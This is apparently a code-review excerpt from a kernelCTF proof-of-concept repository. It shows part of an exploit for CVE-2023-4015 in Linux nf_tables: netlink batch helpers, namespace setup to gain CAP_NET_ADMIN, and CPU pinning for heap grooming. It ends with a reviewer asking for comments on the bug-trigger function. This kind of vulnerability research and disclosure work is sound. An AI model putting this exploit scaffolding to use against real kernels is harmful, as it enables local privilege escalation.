pocs/linux/kernelctf/CVE-2023-4015_lts_2/exploit/lts-6.1.36/exploit.c

```diff
@@ -0,0 +1,654 @@
+    mnl_nlmsg_batch_stop(b);
+}
+
+static void batch_new_table(batch b, table t) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWTABLE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_table_nlmsg_build_payload(hdr, t);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_new_chain(batch b, chain c) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWCHAIN, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_chain_nlmsg_build_payload(hdr, c);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_del_chain(batch b, chain c) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELCHAIN, family, NLM_F_ACK, seq++);
+    nftnl_chain_nlmsg_build_payload(hdr, c);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_new_rule(batch b, rule r) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWRULE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_rule_nlmsg_build_payload(hdr, r);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_del_rule(batch b, rule r) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELRULE, family, NLM_F_ACK, seq++);
+    nftnl_rule_nlmsg_build_payload(hdr, r);
+    mnl_nlmsg_batch_next(b);
+}
+
+static nlmsghdr dump_rule(rule r, char *buf) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, family, NLM_F_ACK, seq++);
+    nftnl_rule_nlmsg_build_payload(hdr, r);
+    return hdr;
+}
+
+static int run_callbacks(sock s, mnl_cb_t cb, void *data) {
+    // INFO("Start callback: rseq = %d, seq = %d", rseq, seq);
+    char buf[MNL_SOCKET_BUFFER_SIZE];
+    int ret = 0;
+    while (rseq < seq) {
+        ret = mnl_socket_recvfrom(s, buf, sizeof(buf));
+        if (ret <= 0)
+            break;
+        ret = mnl_cb_run(buf, ret, rseq, mnl_socket_get_portid(s), cb, data);
+        if (ret < 0)
+            break;
+        rseq += ret == 0;
+    }
+    // INFO("End callback: rseq = %d, seq = %d", rseq, seq);
+    return ret;
+}
+
+static int setup() {
+    // In order to use nf_tables, we need CAP_NET_ADMIN
+    INFO("Setting up user namespace");
+
+    if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
+        ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)");
+        return -1;
+    }
+
+    // Pin process to a single CPU to avoid nf_tables allocations to spill over different slabs
+    INFO("Pinning process to CPU #0");
+
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(0, &set);
+    if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) {
+        ERROR("sched_setaffinity");
+        return -1;
+    }
+
+    INFO("Creating netfilter netlink socket");
+    if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) {
+        ERROR("mnl_socket_open(NETLINK_NETFILTER)");
+        return -1;
+    }
+
+    return 0;
+}
+
+static int trigger_uaf() {
```

Comment:
Could you add some comments to this function so it's easier to follow along in reading the bug trigger? E.g. create a chain X with use count 1. Reference an invalid chain causing a rollback triggering the bug. Etc